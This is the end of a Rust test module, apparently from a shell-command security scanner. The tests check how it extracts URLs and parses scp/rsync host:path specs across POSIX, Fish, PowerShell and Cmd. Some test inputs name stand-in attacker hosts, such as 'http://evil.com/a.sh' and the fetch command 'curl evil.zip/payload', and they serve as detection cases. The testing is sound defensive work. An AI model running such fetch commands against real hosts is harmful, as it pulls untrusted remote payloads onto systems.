2019        assert_eq!(schemeless[0].raw, "user@bit.ly");
2020    }
2021
2022    #[test]
2023    fn test_scp_user_at_host_not_treated_as_schemeless_url() {
2024        let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
2025        let schemeless: Vec<_> = urls
2026            .iter()
2027            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2028            .collect();
2029        assert!(schemeless.is_empty());
2030    }
2031
2032    fn scp_has_schemeless(cmd: &str, shell: ShellType) -> bool {
2033        extract_urls(cmd, shell)
2034            .iter()
2035            .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2036    }
2037
2038    #[test]
2039    fn test_scp_plain_host_path_not_schemeless() {
2040        // The reporter's exact command shape.
2041        assert!(!scp_has_schemeless(
2042            "scp test.asdf testhost:/home/user/",
2043            ShellType::Posix
2044        ));
2045    }
2046
2047    #[test]
2048    fn test_scp_plain_host_relative_path_not_schemeless() {
2049        assert!(!scp_has_schemeless(
2050            "scp file.txt host:dir/",
2051            ShellType::Posix
2052        ));
2053    }
2054
2055    #[test]
2056    fn test_rsync_plain_host_path_not_schemeless() {
2057        assert!(!scp_has_schemeless(
2058            "rsync -av src host:/dest/",
2059            ShellType::Posix
2060        ));
2061    }
2062
2063    #[test]
2064    fn test_scp_one_letter_alias_posix_accepted() {
2065        // `x:/tmp/` on POSIX is a legitimate single-letter SSH alias.
2066        // The drive-letter guard must NOT reject this.
2067        assert!(!scp_has_schemeless("scp file x:/tmp/", ShellType::Posix));
2068    }
2069
2070    #[test]
2071    fn test_scp_windows_backslash_always_rejected() {
2072        // `C:\...` is never an scp remote — any shell.
2073        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Posix).is_none());
2074        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::PowerShell).is_none());
2075        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Cmd).is_none());
2076        assert!(parse_scp_remote_spec("D:\\backup", ShellType::Posix).is_none());
2077    }
2078
2079    #[test]
2080    fn test_scp_windows_forward_slash_shell_scoped() {
2081        // `C:/Users/me/file` is a drive path on PowerShell/Cmd, but on POSIX
2082        // it collides with the legitimate one-letter alias form — accept there.
2083        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::PowerShell).is_none());
2084        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Cmd).is_none());
2085        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Posix).is_some());
2086        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Fish).is_some());
2087    }
2088
2089    #[test]
2090    fn test_scp_windows_ambiguous_drive_letter_accepted() {
2091        // `C:foo` is ambiguous with scp's `x:relative-path` alias form — accept
2092        // it in every shell to preserve back-compat; narrow guards beat blanket
2093        // bans here.
2094        for shell in [
2095            ShellType::Posix,
2096            ShellType::Fish,
2097            ShellType::PowerShell,
2098            ShellType::Cmd,
2099        ] {
2100            assert!(
2101                parse_scp_remote_spec("C:foo", shell).is_some(),
2102                "C:foo should parse as remote in shell {shell:?}"
2103            );
2104            assert!(
2105                parse_scp_remote_spec("D:backup/x.txt", shell).is_some(),
2106                "D:backup/x.txt should parse as remote in shell {shell:?}"
2107            );
2108        }
2109    }
2110
2111    #[test]
2112    fn test_scp_rejects_url_scheme() {
2113        assert!(parse_scp_remote_spec("http://evil.com/a.sh", ShellType::Posix).is_none());
2114        assert!(parse_scp_remote_spec("https://a.b/c", ShellType::Posix).is_none());
2115    }
2116
2117    #[test]
2118    fn test_scp_rejects_flag_and_absolute_local() {
2119        assert!(parse_scp_remote_spec("-P", ShellType::Posix).is_none());
2120        assert!(parse_scp_remote_spec("--port=22", ShellType::Posix).is_none());
2121        // `/tmp:weird` — `:` preceded by `/` means absolute local path.
2122        assert!(parse_scp_remote_spec("/tmp:weird", ShellType::Posix).is_none());
2123    }
2124
2125    #[test]
2126    fn test_scp_accepts_user_at_host_forms() {
2127        // Back-compat with the original covered shape.
2128        assert!(parse_scp_remote_spec("user@server.com:file.txt", ShellType::Posix).is_some());
2129        assert!(parse_scp_remote_spec("user@host:/path", ShellType::Posix).is_some());
2130    }
2131
2132    #[test]
2133    fn test_scp_rejects_missing_parts() {
2134        assert!(parse_scp_remote_spec("", ShellType::Posix).is_none());
2135        assert!(parse_scp_remote_spec(":path", ShellType::Posix).is_none()); // empty host
2136        assert!(parse_scp_remote_spec("@host:path", ShellType::Posix).is_none()); // empty user
2137        assert!(parse_scp_remote_spec("user@:path", ShellType::Posix).is_none());
2138        // empty host
2139    }
2140
2141    #[test]
2142    fn test_scp_rejects_host_with_slash() {
2143        // Host must not contain `/`.
2144        assert!(parse_scp_remote_spec("foo/bar:baz", ShellType::Posix).is_none());
2145    }
2146
2147    #[test]
2148    fn test_parse_scp_remote_spec_fields_populated() {
2149        // Exercise the parser's structured output so downstream consumers
2150        // of user/host/path can rely on the fields rather than just the
2151        // Option presence check.
2152        let spec = parse_scp_remote_spec("user@server.com:/path", ShellType::Posix).unwrap();
2153        assert_eq!(spec.user.as_deref(), Some("user"));
2154        assert_eq!(spec.host, "server.com");
2155        assert_eq!(spec.path, "/path");
2156
2157        let spec = parse_scp_remote_spec("host:/dest/", ShellType::Posix).unwrap();
2158        assert_eq!(spec.user, None);
2159        assert_eq!(spec.host, "host");
2160        assert_eq!(spec.path, "/dest/");
2161    }
2162
2163    #[test]
2164    fn test_schemeless_png_no_slash_is_file() {
2165        assert!(!looks_like_schemeless_host("lenna.png"));
2166    }
2167
2168    #[test]
2169    fn test_schemeless_tld_overlap_with_path_is_domain() {
2170        // evil.zip/payload has a path component, so the .zip extension heuristic
2171        // should NOT suppress it — evil.zip is a real TLD and this is a domain.
2172        assert!(looks_like_schemeless_host("evil.zip/payload"));
2173        assert!(looks_like_schemeless_host("evil.sh/payload"));
2174    }
2175
2176    #[test]
2177    fn test_schemeless_tld_overlap_without_path_is_file() {
2178        // Without a path, lenna.zip / script.sh look like filenames, not domains.
2179        assert!(!looks_like_schemeless_host("lenna.zip"));
2180        assert!(!looks_like_schemeless_host("script.sh"));
2181    }
2182
2183    #[test]
2184    fn test_schemeless_tld_overlap_sink_context_detected() {
2185        // In a real sink context, evil.zip/payload should be detected as schemeless URL.
2186        let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
2187        let schemeless: Vec<_> = urls
2188            .iter()
2189            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2190            .collect();
2191        assert!(
2192            !schemeless.is_empty(),
2193            "evil.zip/payload should be detected as schemeless URL in sink context"
2194        );
2195    }
2196}
tirith_core/extract.rs

tirith_core/
extract.rs